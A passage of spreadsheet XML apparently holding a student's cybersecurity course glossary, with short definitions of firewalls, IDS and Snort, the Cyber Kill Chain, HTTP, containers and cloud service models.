    <t>Rules for allow / deny:</t>
  </si>
  <si>
    <t>Examines source and destination IP addresses, port numbers, and packet types, all without opening the packet. Also uses TCP handshake, packet inspection</t>
  </si>
  <si>
    <t>Firewalld:</t>
  </si>
  <si>
    <t>Zones:</t>
  </si>
  <si>
    <t>The organization of rules and each zone can contains several rules</t>
  </si>
  <si>
    <t>Runtime configurations:</t>
  </si>
  <si>
    <t xml:space="preserve">Valid until the next system reboot or service reload. Allows us to create settings that are active for a limited amount of time. </t>
  </si>
  <si>
    <t>Permanent configurations:</t>
  </si>
  <si>
    <t>Loaded with each reboot and reload and become the current runtime environment until new runtime configurations are made.</t>
  </si>
  <si>
    <t>/etc/init.d/firewalld:</t>
  </si>
  <si>
    <t>Firewall service location</t>
  </si>
  <si>
    <t>Firewalking:</t>
  </si>
  <si>
    <t>Allows attackers to perform network analysis to determine which Layer 4 protocols a specific firewall allows.</t>
  </si>
  <si>
    <t>11.2 Intrusion Detection, Snort, and Network Security Monitoring</t>
  </si>
  <si>
    <t>Intrusion Detection Systems (IDS):</t>
  </si>
  <si>
    <t>A passive device or software application that monitors network or system activities for malicious activities or policy violations and produces reports to a management station.</t>
  </si>
  <si>
    <t>Signature-based IDS:</t>
  </si>
  <si>
    <t xml:space="preserve">Compares patterns of traffic to predefined signatures. 
</t>
  </si>
  <si>
    <t>Anomaly-based IDS:</t>
  </si>
  <si>
    <t xml:space="preserve">Compares patterns of traffic against a well-known baseline. 
</t>
  </si>
  <si>
    <t>Network intrusion detection (NIDS):</t>
  </si>
  <si>
    <t>Filters an entire subnet on a network, by Matching all traffic to a known library of attack signatures, passively examines network traffic at points that it’s deployed, and relatively easy to deploy and difficult to detect by attackers.</t>
  </si>
  <si>
    <t>Host-based intrusion detection (HIDS):</t>
  </si>
  <si>
    <t xml:space="preserve">Runs locally on a host-based system or user’s workstation or server. Acts as a second line of defense against malicious traffic that successfully gets past a NIDS. Examines entire file systems on a host, compares them to previous snapshots or baselines, and generates an alert if there are significant differences between the two. </t>
  </si>
  <si>
    <t>Intrusion Prevention System (IPS) :</t>
  </si>
  <si>
    <t xml:space="preserve">Can do everything an IDS can, but can also respond to attacks.  </t>
  </si>
  <si>
    <t>Network TAP (Test Access Port) :</t>
  </si>
  <si>
    <t xml:space="preserve">A IDS hardware device that provides access to a network. Network taps transit both inbound and outbound data streams on separate channels at the same time, so all data will arrive at the monitoring device in real time.
</t>
  </si>
  <si>
    <t>SPAN (Switched Port Analyzer):</t>
  </si>
  <si>
    <t xml:space="preserve">IDS component that sends a mirror image of all network data to another physical port, where the packets can be captured and analyzed.
</t>
  </si>
  <si>
    <t>IDS Alerts:</t>
  </si>
  <si>
    <t>A message that is sent to an analyst’s console as an Indicator of Attack. Also generates alerts when a it detects malicious traffic that matches a signature.</t>
  </si>
  <si>
    <t>Indicator of Attack (IOA):</t>
  </si>
  <si>
    <t xml:space="preserve">Indicate that an attck is currently in progress but a full breach has not been determined.
</t>
  </si>
  <si>
    <t xml:space="preserve">Indicator of Compromise (IOC):
</t>
  </si>
  <si>
    <t xml:space="preserve">Indicate previous malicious activity and detects that an attack has occurred, resulting in a breach.
</t>
  </si>
  <si>
    <t xml:space="preserve">Snort IDS engine: </t>
  </si>
  <si>
    <t>Snort - Sniffer mode:</t>
  </si>
  <si>
    <t xml:space="preserve">Reads network packets and displays them on screen. 
</t>
  </si>
  <si>
    <t>Snort - Packet logger mode:</t>
  </si>
  <si>
    <t xml:space="preserve">Performs packet captures by logging all traffic to disk. 
</t>
  </si>
  <si>
    <t>Snort - Network IDS mode:</t>
  </si>
  <si>
    <t xml:space="preserve">Monitors network traffic, analyzes it, and performs specific actions based on administratively defined rules. 
</t>
  </si>
  <si>
    <t>Snort Rules - OSI layer:</t>
  </si>
  <si>
    <t xml:space="preserve">We can watch for IP and TCP data. 
</t>
  </si>
  <si>
    <t>Snort Rules - Source and destination address:</t>
  </si>
  <si>
    <t xml:space="preserve">Where the traffic is flowing from and to.
</t>
  </si>
  <si>
    <t>Snort Rules - Byte sequences:</t>
  </si>
  <si>
    <t xml:space="preserve">Patterns contained in data packets that might indicate malware, etc. 
</t>
  </si>
  <si>
    <t>Network Security Monitoring (NSM):</t>
  </si>
  <si>
    <t>Uses a variety of data analysis tools to detect and stop threats after most front-end layers are compromised.</t>
  </si>
  <si>
    <t>NSM Stage - Detection Collection:</t>
  </si>
  <si>
    <t>The event is observed and the data is stored in the form of a PCAP file</t>
  </si>
  <si>
    <t>NSM Stage - Detection Analysis:</t>
  </si>
  <si>
    <t xml:space="preserve">The alert data is identified, validated, documented, and categorized according to its threat level.
</t>
  </si>
  <si>
    <t>NSM Stage - Response Escalation:</t>
  </si>
  <si>
    <t xml:space="preserve">All relevant parties are notified about the security incident.
</t>
  </si>
  <si>
    <t>NSM Stage - Response Resolution:</t>
  </si>
  <si>
    <t xml:space="preserve">The process of containment, remediation, and any additional necessary response.
</t>
  </si>
  <si>
    <t>Squil Section -  Alert panel:</t>
  </si>
  <si>
    <t>Displays detailed alert data; Source and destination IP, Source and destination port, Alert ID and severity, Event message (message generated by Snort rule option)</t>
  </si>
  <si>
    <t>Squil Section -  Snort rule:</t>
  </si>
  <si>
    <t xml:space="preserve">The Snort rule that generated the alert, obtained from the IDS engine.
</t>
  </si>
  <si>
    <t>Squil Section -  Packet data:</t>
  </si>
  <si>
    <t>PCAP file showing header and payload information of the data.</t>
  </si>
  <si>
    <t>Squil Section -  IP resolution:</t>
  </si>
  <si>
    <t xml:space="preserve">Displays reverse DNS lookup information.
</t>
  </si>
  <si>
    <t>Squil Alerts - ST (status):</t>
  </si>
  <si>
    <t>Colors indicate severity levels of real-time or “RT” events. Red = Critical, Orange=Moderate, Yellow=general</t>
  </si>
  <si>
    <t>Squil Alerts - Alert ID:</t>
  </si>
  <si>
    <t xml:space="preserve">A randomly generated numerical ID created by Sguil.
</t>
  </si>
  <si>
    <t>Squil Alerts - Source IP:</t>
  </si>
  <si>
    <t xml:space="preserve">IP address of the source identified by the alert.
</t>
  </si>
  <si>
    <t>Squil Alerts - Event message:</t>
  </si>
  <si>
    <t xml:space="preserve">The message generated by the Snort rule option.
</t>
  </si>
  <si>
    <t>Enterprise Security Monitoring (ESM):</t>
  </si>
  <si>
    <t>Monitoring of all risks that may affect the core business of an organization.</t>
  </si>
  <si>
    <t>11.3 Enterprise Security Management</t>
  </si>
  <si>
    <t>C2 Beacon:</t>
  </si>
  <si>
    <t>A type of malicious communication between a C&amp;C server and malware on an infected host.</t>
  </si>
  <si>
    <t>Command and Control C2 Server</t>
  </si>
  <si>
    <t xml:space="preserve">Used to create a specific type of alert for attacks that use persistence as part of their attack campaigns.  </t>
  </si>
  <si>
    <t>Endpoint Telemetry :</t>
  </si>
  <si>
    <t>A host-based monitoring of system data</t>
  </si>
  <si>
    <t>OSSEC:</t>
  </si>
  <si>
    <t>Provides visibility at the host level, where malware infection takes place after it’s decrypted.</t>
  </si>
  <si>
    <t>Elastic Stack:</t>
  </si>
  <si>
    <t>Three other important OSSEC tools to fully analyze packet captures. Elasticsearch + LogStash + Kibana</t>
  </si>
  <si>
    <t>ElasticSearch:</t>
  </si>
  <si>
    <t>A distributed, restful search and analytics engine capable of addressing thousands of data points seen within network traffic. Helps security administrators locate the expected and uncover the unexpected</t>
  </si>
  <si>
    <t>LogStash:</t>
  </si>
  <si>
    <t>Open source, server-side data processing pipeline built into Security Onion. 
Ingests data from many sources at the same time by transforming it and sending it to designated log files, referred to as stashes.</t>
  </si>
  <si>
    <t>Kibana:</t>
  </si>
  <si>
    <t>Threat intelligence :</t>
  </si>
  <si>
    <t>Determines acceptable risk and develops security controls that inform budgets.</t>
  </si>
  <si>
    <t>threat intelligence cards:</t>
  </si>
  <si>
    <t>Document the TTPs used by an adversary to infiltrate a network and conducted by CIRTs</t>
  </si>
  <si>
    <t>Threat Intelligence Triad:</t>
  </si>
  <si>
    <t>Actors, Capability, and Intent informs situationally aware decision making, enhanced network defense operations, and effective tactical assessments.</t>
  </si>
  <si>
    <t>Cyber Kill Chain Framework:</t>
  </si>
  <si>
    <t>Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command &amp; Control (C2), Actions on Objectives</t>
  </si>
  <si>
    <t>CKCF - Reconnaissance:</t>
  </si>
  <si>
    <t>Information gathering stage against targeted victim. Information sources include:_x000b_DNS registration websites, LinkedIn, Facebook, Twitter, etc.</t>
  </si>
  <si>
    <t>CKCF - Weaponization:</t>
  </si>
  <si>
    <t xml:space="preserve">After collecting information regarding infrastructure and employees, adversaries have the capability to establish attack vectors and technical profiles of targets such as: logical and administrative security controls, infil/exfil points, etc.
</t>
  </si>
  <si>
    <t>CKCF - Delivery:</t>
  </si>
  <si>
    <t xml:space="preserve">The delivery of the weaponized payload, via email, website, USB, etc.
</t>
  </si>
  <si>
    <t>CKCF - Exploitation:</t>
  </si>
  <si>
    <t xml:space="preserve">Actively compromise adversary’s applications and servers while averting the physical, logical, and administrative controls. Exploiting employees through social engineering. This stage prepares for escalation during the installation phase.
</t>
  </si>
  <si>
    <t>CKCF -  Installation:</t>
  </si>
  <si>
    <t>The persistence preparation phase. Activities include malicious software installation, backdoor implants, persistence mechanism, ie. Cron Jobs, AutoRun keys, services, log file deletion, and timestamp manipulation.</t>
  </si>
  <si>
    <t>CKCF - Command &amp; Control (C2):</t>
  </si>
  <si>
    <t xml:space="preserve">A command channel, most typically Internet Relay Chat (IRC) , used for remote control of a victim’s computer.
</t>
  </si>
  <si>
    <t>CKCF - Actions on Objectives:</t>
  </si>
  <si>
    <t xml:space="preserve">After achieving the equivalent of “Hands on Keyboard” access to a victim's systems, adversaries are now able to act their objectives.
</t>
  </si>
  <si>
    <t>Penetration Testers :</t>
  </si>
  <si>
    <t>Ethical hackers who try to find and exploit vulnerabilities and gain privileged access to web applications.</t>
  </si>
  <si>
    <t>12.1 HTTP with Session and Cookies</t>
  </si>
  <si>
    <t>Risk Assessors :</t>
  </si>
  <si>
    <t>Must understand the risk profiles and tolerances within web applications so they can help companies follow best practices and policies.</t>
  </si>
  <si>
    <t>Web application Security Engineers :</t>
  </si>
  <si>
    <t>Must deeply understand how their company’s web application works and how to secure it.</t>
  </si>
  <si>
    <t>Client–Server Model :</t>
  </si>
  <si>
    <t>An exchange of information, a cycle of requests and responses between clients and servers.</t>
  </si>
  <si>
    <t>Client:</t>
  </si>
  <si>
    <t>A desktop computer or workstation that is capable of obtaining information and applications from a server.</t>
  </si>
  <si>
    <t>Web server :</t>
  </si>
  <si>
    <t>A web server is computer software and underlying hardware that accepts requests via HTTP or its secure variant HTTPS.</t>
  </si>
  <si>
    <t>Application server:</t>
  </si>
  <si>
    <t>Database server:</t>
  </si>
  <si>
    <t>HTTP Methods:</t>
  </si>
  <si>
    <t xml:space="preserve">Indicates the specific actions between the client and server. </t>
  </si>
  <si>
    <t>HTTP Request Methods -  GET:</t>
  </si>
  <si>
    <t>Requests data from a server.</t>
  </si>
  <si>
    <t>HTTP Request Methods - HEAD :</t>
  </si>
  <si>
    <t>Identical to GET, but the server does not send the response body.</t>
  </si>
  <si>
    <t>HTTP Request Methods -  POST:</t>
  </si>
  <si>
    <t>Sends data to a source, often changing or updating a server.</t>
  </si>
  <si>
    <t>HTTP Request Methods -  PUT:</t>
  </si>
  <si>
    <t>Replaces current data with the new value.</t>
  </si>
  <si>
    <t>HTTP Request Methods -  DELETE</t>
  </si>
  <si>
    <t>Deletes a specified resource.</t>
  </si>
  <si>
    <t>HTTP Request Methods -  CONNECT:</t>
  </si>
  <si>
    <t>Establishes a tunnel to the server.</t>
  </si>
  <si>
    <t>HTTP Request Methods -  OPTIONS:</t>
  </si>
  <si>
    <t>Lists the communication options for target resource.</t>
  </si>
  <si>
    <t>GET Request - Request Line:</t>
  </si>
  <si>
    <t>Contains the request method, the name of the requested resource, and the version of HTTP in use. Can also contain query parameters, which the client can use to send data to the server.</t>
  </si>
  <si>
    <t>GET Request - Headers:</t>
  </si>
  <si>
    <t>Headers contain additional details about the requested resource. They contain many actions with security implications, such as authentication and remembering user resources. You don’t have to remember every type of header. We’ll cover some of the most important ones in class.</t>
  </si>
  <si>
    <t>GET Request - Whitespace:</t>
  </si>
  <si>
    <t xml:space="preserve">A blank line indicating the end of the request.
</t>
  </si>
  <si>
    <t>GET  Request - Request body (optional) :</t>
  </si>
  <si>
    <t>POST Request :</t>
  </si>
  <si>
    <t xml:space="preserve">Similar to GET requests, but include a request body below the whitespace. The request body may contain information such as login credentials or a file to be uploaded. 
</t>
  </si>
  <si>
    <t>HTTP Response - Status line:</t>
  </si>
  <si>
    <t>Contains the response status code and phrase that translates the result, such as OK or Error.</t>
  </si>
  <si>
    <t>HTTP Response - Headers:</t>
  </si>
  <si>
    <t>Contain additional information about the response, similar to request headers.</t>
  </si>
  <si>
    <t>HTTP Response - Whitespace:</t>
  </si>
  <si>
    <t>Separates the header with the following response body.</t>
  </si>
  <si>
    <t>HTTP Response - Response body:</t>
  </si>
  <si>
    <t>Contains the resource requested by the client.</t>
  </si>
  <si>
    <t>HTTP Status Codes -  200 codes:</t>
  </si>
  <si>
    <t xml:space="preserve">Indicate success.
</t>
  </si>
  <si>
    <t>HTTP Status Codes -  300 codes:</t>
  </si>
  <si>
    <t>Indicate multiple choices, meaning the server can respond to the request in more than one way.</t>
  </si>
  <si>
    <t>HTTP Status Codes -  400 codes:</t>
  </si>
  <si>
    <t>Indicate client errors, meaning the client sent an improperly formatted request.</t>
  </si>
  <si>
    <t>HTTP Status Codes -  500 codes:</t>
  </si>
  <si>
    <t>Indicate server errors, meaning the server application failed somehow.</t>
  </si>
  <si>
    <t>Curl:</t>
  </si>
  <si>
    <t>a command-line client that allows us to send data to and from servers.</t>
  </si>
  <si>
    <t>Stateless:</t>
  </si>
  <si>
    <t>Whenever your browser requests a webpage, there is no way for that webpage to distinguish you from anyone else.</t>
  </si>
  <si>
    <t>Sessions:</t>
  </si>
  <si>
    <t>Unique server-side sets of user data used to customize webpages for the specific user accessing them.</t>
  </si>
  <si>
    <t>Cookies:</t>
  </si>
  <si>
    <t>Small pieces of text data that, when sent by an HTTP server’s response header, are saved by the user’s HTTP client.</t>
  </si>
  <si>
    <t>Microservices Model:</t>
  </si>
  <si>
    <t>An architectural and organizational approach to software development where software is composed of small independent services that communicate over well-defined APIs.</t>
  </si>
  <si>
    <t>12.2 Microservices and Conntainer Security</t>
  </si>
  <si>
    <t>Web App Comp - Front End Server:</t>
  </si>
  <si>
    <t>Responsible for displaying webpages and styling them in a readable format. This server also receives and responds to HTTP requests.</t>
  </si>
  <si>
    <t>Web App Comp - Back End Server:</t>
  </si>
  <si>
    <t>Executes business logic and writing or reading corresponding data to and from a database. The back end server knows how to interact with the database depending on the specific request received.</t>
  </si>
  <si>
    <t>Web App Comp - Database:</t>
  </si>
  <si>
    <t>Stores information on employees, such as their employee IDs and names. Critical and sensitive information is found in databases.</t>
  </si>
  <si>
    <t>Monolith:</t>
  </si>
  <si>
    <t>A single machine that hosts all the components required to serve a website or application.</t>
  </si>
  <si>
    <t>Microservices:</t>
  </si>
  <si>
    <t>Separating application components into their own machines.</t>
  </si>
  <si>
    <t>Modular:</t>
  </si>
  <si>
    <t>Used for Microservicing consisting of smaller and separate parts.</t>
  </si>
  <si>
    <t>API:</t>
  </si>
  <si>
    <t>The implementation of new protocols or features onto an existing software application to alter the way that application is used or accessed.</t>
  </si>
  <si>
    <t>Stack:</t>
  </si>
  <si>
    <t>List of all the technology services used to build and run a single application or website.</t>
  </si>
  <si>
    <t>LAMP Stack:</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>L</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">inux as the base operating system
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">pache to handle the front-end HTTP requests &amp; responses
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>M</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">ySQL for storing data
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>P</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t>HP for back-end transformation of front-end requests and responses to database queries</t>
    </r>
  </si>
  <si>
    <t>Alpine Linux:</t>
  </si>
  <si>
    <t>A super lightweight Linux distribution that has the minimum requirements to run containers.</t>
  </si>
  <si>
    <t>Stack: Operating Systems</t>
  </si>
  <si>
    <t>The  base operating systems used for web applications, eg ubuntu, red hat, suse, windows server 2016 or higher.</t>
  </si>
  <si>
    <t>Stack: Front-end Server</t>
  </si>
  <si>
    <t>Handles the HTTP requests and responses. It is usually some form of HTTP server running on a lightweight containerized operating system. EG APACHE, NGINX, Microsoft IIS.</t>
  </si>
  <si>
    <t>Stack: Database Server</t>
  </si>
  <si>
    <t>Data for the application is housed in the database server. Could be multiple databases, some for storing sessions and cookies and some for storing business logic like a company’s employee directory. EG MySQL, MariaDB, PostgreSQL, etc.</t>
  </si>
  <si>
    <t>Stack: Back-end Server:</t>
  </si>
  <si>
    <t xml:space="preserve">that transmits data between the front end and database and runs fully-featured scripting and programming languages. EG php, Perl, python, nodejs.
</t>
  </si>
  <si>
    <t>WIMP Stack:</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">indows operating system
Microsoft’s </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>I</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">IS web server in place of Apache/Nginx
Database such as </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>M</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">icrosoft SQL Server
Back-end language such as </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>P</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t>owerShell</t>
    </r>
  </si>
  <si>
    <t>LEMP Stack:</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>Linux:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> The standard underlying operating system used for web applications. However, we will use it with containers.
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>NGINX</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve">: Front-end HTTP server, instead of Apache, mainly for its speed. 
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>MariaDB:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> Unofficially the “other” MySQL, it is a standard relational database that will handle our data storage.
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <b/>
        <color theme="1"/>
      </rPr>
      <t>PHP:</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial"/>
        <color theme="1"/>
      </rPr>
      <t xml:space="preserve"> pages will be generated with data pulled by PHP scripts. We will not need to manage or work with any PHP directly today, but know that it is acting as our back-end language.</t>
    </r>
  </si>
  <si>
    <t>Containerization:</t>
  </si>
  <si>
    <t xml:space="preserve">The process of packaging all the requirements for a microserviceinto a container. </t>
  </si>
  <si>
    <t>Docker Compose :</t>
  </si>
  <si>
    <t>Allows us to create repeated, multi-container deployments.</t>
  </si>
  <si>
    <t>YAML File Compo - Image:</t>
  </si>
  <si>
    <t>Where Docker Compose will retrieve the container image on Docker Hub, which is Apache’s httpd container</t>
  </si>
  <si>
    <t>YAML File Compo - Ports:</t>
  </si>
  <si>
    <t>Ports this container will run on.</t>
  </si>
  <si>
    <t>YAML File Compo - Volumes</t>
  </si>
  <si>
    <t>Local destination where the Apache server will save configuration files.</t>
  </si>
  <si>
    <t>YAML File Compo - Networks:</t>
  </si>
  <si>
    <t>The network that this service will connect to</t>
  </si>
  <si>
    <t>YAML File Compo - ipv4_address:</t>
  </si>
  <si>
    <t>The static IP address we are assigning to this container.</t>
  </si>
  <si>
    <t xml:space="preserve">YAML File Compo - environment: </t>
  </si>
  <si>
    <t>Containers within the MySQL server</t>
  </si>
  <si>
    <t xml:space="preserve">YAML File Compo - MYSQL_DATABASE: </t>
  </si>
  <si>
    <t>The name of the database</t>
  </si>
  <si>
    <t xml:space="preserve">YAML File Compo - MYSQL_USER: </t>
  </si>
  <si>
    <t>The default user for the database</t>
  </si>
  <si>
    <t xml:space="preserve">YAML File Compo - MYSQL_PASSWORD: </t>
  </si>
  <si>
    <t>The password for the user</t>
  </si>
  <si>
    <t xml:space="preserve">YAML File Compo - MYSQL_RANDOM_ROOT_PASSWORD: </t>
  </si>
  <si>
    <t>Gives the root user a random password for security purposes</t>
  </si>
  <si>
    <t>Database Security:</t>
  </si>
  <si>
    <t>Compromise of one machine does not imply compromise of the other.</t>
  </si>
  <si>
    <t>Many servers may use the same database.</t>
  </si>
  <si>
    <t>SQL Database:</t>
  </si>
  <si>
    <t>Database organized data like a spreadsheet.</t>
  </si>
  <si>
    <t>CRUD operations:</t>
  </si>
  <si>
    <t>Once you’ve created a table, the four main ways to interact with the data.</t>
  </si>
  <si>
    <t>CRUD -  Create</t>
  </si>
  <si>
    <t>Add new entries to a database.</t>
  </si>
  <si>
    <t>CRUD - Read</t>
  </si>
  <si>
    <t>View entries in a database.</t>
  </si>
  <si>
    <t>CRUD - Update</t>
  </si>
  <si>
    <t xml:space="preserve">Modify existing data in a database. 
</t>
  </si>
  <si>
    <t>CRUD - Delete:</t>
  </si>
  <si>
    <t xml:space="preserve">Destroy data in the database.
</t>
  </si>
  <si>
    <t>queries</t>
  </si>
  <si>
    <t>CRUD operations.</t>
  </si>
  <si>
    <t>SQL injections :</t>
  </si>
  <si>
    <t>A type of web application attack intended to manipulate queries so that an attacker can use a database in ways the developers did not originally intend.</t>
  </si>
  <si>
    <t xml:space="preserve">On-premises networks:
</t>
  </si>
  <si>
    <t xml:space="preserve">set up of networks on devices they owned and controlled. </t>
  </si>
  <si>
    <t>13.1 Intro to Cloud Computing</t>
  </si>
  <si>
    <t>Cloud computing:</t>
  </si>
  <si>
    <t>Move operations to a cloud provider but are worried about security.</t>
  </si>
  <si>
    <t>Cloud Security Concerns - Complex architecture:</t>
  </si>
  <si>
    <t>Systems must be built to ensure basic security and allow infrastructure personnel to securely monitor, reconfigure, and redeploy machines as needed.
Typically easier to do securely with on-premises machines.
Cloud deployments are remote; extra steps must be taken to ensure they are only exposed to the relevant parties.</t>
  </si>
  <si>
    <t>Cloud Security Concerns - Extensive management:</t>
  </si>
  <si>
    <t>The cloud offers more flexibility than organizations are used to, giving them freedom to create many more machines. 
This flexibility makes operations management more complex, requiring additional skills and techniques.</t>
  </si>
  <si>
    <t>Cloud Security Concerns - Different threats:</t>
  </si>
  <si>
    <t>The cloud is exposed to public networks.
Providers handle certain aspects of security, which means security professionals have new and different considerations. 
Malicious actors will execute new escalation and lateral movement tactics.</t>
  </si>
  <si>
    <t>Cloud Security Concerns - Ensuring availability:</t>
  </si>
  <si>
    <t>High availability of machines is a large part of security on the cloud. 
Ensuring availability and redundancy on the cloud is different than with on-premises environments.</t>
  </si>
  <si>
    <t>Cloud Analyst or Cloud SecurityPenetration Tester:</t>
  </si>
  <si>
    <t>These roles must understand cloud architecture in order to test the security settings for a given environment.</t>
  </si>
  <si>
    <t>Cloud Architect:</t>
  </si>
  <si>
    <t>This role builds out a cloud environment for an organization. They’re expected to understand how to build in security from the ground up.</t>
  </si>
  <si>
    <t>DevSecOps:</t>
  </si>
  <si>
    <t>These roles are responsible for maintaining production and testing environments for an organization. They’re expected to build and maintain secure systems at every step of the development process.</t>
  </si>
  <si>
    <t>Cloud Service Model:</t>
  </si>
  <si>
    <t>a model for enabling ubiquitous, convenient, and on-demand network access to a shared pool of resources.</t>
  </si>
  <si>
    <t>Cloud Service Model - IaaS:</t>
  </si>
  <si>
    <t>Infrastructure as a Service, service provider offers pay-as-you-go access to storage, networking, servers, and other computing resources in the cloud, EG aws Azure, and Google Cloud.</t>
  </si>
  <si>
    <t>Cloud Service Model - Paas:</t>
  </si>
  <si>
    <t xml:space="preserve">Platform as a Service, service provider offers access to a cloud-based environment in which users can build and deliver applications. </t>
  </si>
  <si>
    <t>Cloud Service Model - XaaS:</t>
  </si>
  <si>
    <t>Anything as a Service, services providing all the offerings via cloud computing as opposed to locally, or on-premises.</t>
  </si>
  <si>
    <t>Cloud Service Model - SaaS:</t>
  </si>
  <si>
    <t>Software as a Service, service provider delivers software and applications through the internet. EG, Office 365, iWork.</t>
  </si>
  <si>
    <t>Cloud Service Model - DaaS:</t>
  </si>
  <si>
    <t>Data as a Service/ Database as a Service, service that provides a company’s data product to the user on demand, regardless of geographic or organizational distance between provider and consumer.</t>
  </si>
  <si>
    <t>Cloud Service Model - CaaS:</t>
  </si>
  <si>
    <t>Communications as a Service, service that provides an outsourced communications solution. EG, Voice over IP, Instant Messaging, Video Collaboration.</t>
  </si>
  <si>
    <t>Azure - Resource Groups :</t>
  </si>
  <si>
    <t>Allow engineers to sort related resources into different groups, each of which can be easily located by name.
- Is a logical grouping of all resources used for a particular setup or project. 
- Will contain the network, firewalls, virtual computers, and other resources needed for setup.</t>
  </si>
  <si>
    <t>Virtual Network</t>
  </si>
  <si>
    <t>A collection of virtual machines that can communicate with each other.</t>
  </si>
  <si>
    <t>VN Emulation - vNICs:</t>
  </si>
  <si>
    <t>Similar to physical machines, VMs have software versions of “normal” NICs. 
Just like physical machines, VMs can have multiple vNICs.</t>
  </si>
  <si>
    <t>VN Emulation - IP Addresses:</t>
  </si>
  <si>
    <t>VMs have IP addresses, just like physical computers. 
IP addresses are considered their own type of resource in Azure, AWS, and other cloud environments.</t>
  </si>
  <si>
    <t>VN Emulation - Subnets:</t>
  </si>
  <si>
    <t>Like IP addresses, subnets are considered separate resources in the cloud, meaning they can be created independently of other resources.
After creating a virtual network, we can create a new virtual subnet and add it to the existing network. 
We can also create a new public IP address resource and associate it with an existing virtual machine.</t>
  </si>
  <si>
    <t>Network Security Group (NSG):</t>
  </si>
  <si>
    <t>Azure basic firewall.</t>
  </si>
  <si>
    <t>Hardware - RAM (random access memory):</t>
  </si>
  <si>
    <t>The amount of memory dedicated to running computer operations. The computer 
uses RAM to temporarily store data that it needs to access quickly.</t>
  </si>
  <si>
    <t>Hardware - Storage (HDD / SSD):</t>
  </si>
  <si>
    <t>The part of the computer that stores data permanently. This is data that you do not expect to lose when the computer is turned off</t>
  </si>
  <si>
    <t>Hardware - Disks:</t>
  </si>
  <si>
    <t>OS disks contain the operating system, kernel, and everything required for the VM to function.
Data disks contain data that the VM doesn’t need in order to run, but which users need to do their jobs.</t>
  </si>
  <si>
    <t>Hardware - CPU (central processing unit):</t>
  </si>
  <si>
    <t>CPU is like the brain of the computer. It’s the part that actually computes all the 1s and 0s. The CPU takes code and data out of the long term storage, loads it into RAM, and performs the computations specified by an application.</t>
  </si>
  <si>
    <t>Virtual Computing:</t>
  </si>
  <si>
    <t>Software versions of hardware components. EG, RAM, CPU, Storage</t>
  </si>
  <si>
    <t>containers</t>
  </si>
  <si>
    <t>lightweight VMs</t>
  </si>
  <si>
    <t>13.2 Cloud System Management</t>
  </si>
  <si>
    <t>Provisioners</t>
  </si>
  <si>
    <t xml:space="preserve">tools that automatically configure VMs or containers for you. </t>
  </si>
  <si>
    <t>Infrastructure as code (IaC)</t>
  </si>
  <si>
    <t>the idea that the configurations for all of the VMs, containers, and networks in your deployment should be defined in text files, which you can use with provisioners to automatically recreate machines and networks whenever necessary.</t>
  </si>
  <si>
    <t xml:space="preserve">Continuous Integration/Continuous Deployment (CI/CD)  </t>
  </si>
  <si>
    <t>the concept of automatically updating machines on your network whenever your IaC files change.</t>
  </si>
  <si>
    <t>IaC - Continuous Integration (CI):</t>
  </si>
  <si>
    <t xml:space="preserve">Ensures that a new version of that machine is built immediately.
</t>
  </si>
  <si>
    <t>IaC - Continuous Deployment (CD):</t>
  </si>
  <si>
    <t>Ensures that this new version is automatically deployed to your live environment.</t>
  </si>
  <si>
    <t>Secure configuration:</t>
  </si>
  <si>
    <t>An individual VM or network is protected from intrusion using well-considered rules, such as access control policies and firewall rules.
It follows the right rules.</t>
  </si>
  <si>
    <t xml:space="preserve">Secure architecture:
</t>
  </si>
  <si>
    <t xml:space="preserve">A poorly configured or malfunctioning individual machine can only cause a limited amount of damage.
It is “structurally sound.” </t>
  </si>
  <si>
    <t>fault tolerant system :</t>
  </si>
  <si>
    <t>Important cloud security concepts, that can keep running even if one or more components within the system fail.</t>
  </si>
  <si>
